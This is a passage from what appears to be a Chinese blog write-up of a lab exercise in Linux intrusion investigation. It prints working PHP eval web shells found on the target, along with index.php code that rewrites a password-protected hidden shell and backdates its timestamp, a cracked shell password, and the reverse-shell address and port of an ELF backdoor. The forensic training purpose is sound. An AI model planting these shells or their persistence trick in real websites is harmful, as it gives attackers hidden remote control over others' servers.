Looking for light.

Archive

About

Xiaodi

玄机——Linux入侵排查

首先我们开启靶机。grep一下eval恶意函数,我们可以看到index.php内有后门语句。且sh.php内有第一个flag

./index.php:17:$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
./1.php:1:<?php eval($_POST[1]);?>
./.shell.php:1:<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>


root@xuanji:/var/www/html# cat sh.php
1       2       <?php @eval($_POST['a']);?>     4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

cmd5网站或hashcat爆一下,得到密码为hello。查看index.php内容,发现其负责生成不死马.shell.php

root@ip-10-0-10-1:/var/www/html# cat index.php
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
        $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
        Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
        Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

root@ip-10-0-10-1:/var/www/html# ls -al
total 736
drwxrwxrwx 8 www-data www-data   4096 Aug  3  2023  .
drwxr-xr-x 3 root     root       4096 Aug  3  2023  ..
-rwxrwxrwx 1 www-data www-data     24 Aug  3  2023  1.php
-rw-r--r-- 1 root     root     655360 Aug  3  2023  1.tar
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  admin
-rwxrwxrwx 1 www-data www-data    280 Aug  3  2023  api.php
-rwxrwxrwx 1 www-data www-data    882 Aug  3  2023  config.php
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  data
-rwxrwxrwx 1 www-data www-data    894 Aug  3  2023  favicon.ico
-rwxrwxrwx 1 www-data www-data    142 Aug  3  2023  .htaccess
drwxrwxrwx 4 www-data www-data   4096 Aug  3  2023  include
-rwxrwxrwx 1 root     root        722 Aug  3  2023  index.php
-rwxrwxrwx 1 www-data www-data  12744 Aug  3  2023  install.php
-rwxrwxrwx 1 www-data www-data   1080 Aug  3  2023  LICENSE
drwxrwxrwx 2 www-data www-data   4096 Aug  3  2023  pictures
-rwxrwxrwx 1 www-data www-data   2235 Aug  3  2023  README.md
-rwxrwxrwx 1 www-data www-data   1049 Aug  3  2023  rss.php
-rw-r--r-- 1 www-data www-data    207 Aug  3  2023 'shell(1).elf'
-rw-r--r-- 1 www-data www-data     88 Jan  1  2021  .shell.php
-rwxrwxrwx 1 www-data www-data    566 Aug  3  2023  sitemap.php
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  template
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  wa

当前目录下有一个elf后门文件,我们拿出来分析一下。将此elf文件放入微步云沙箱分析一下即可得到反弹地址10.11.55.21和反弹的port3333.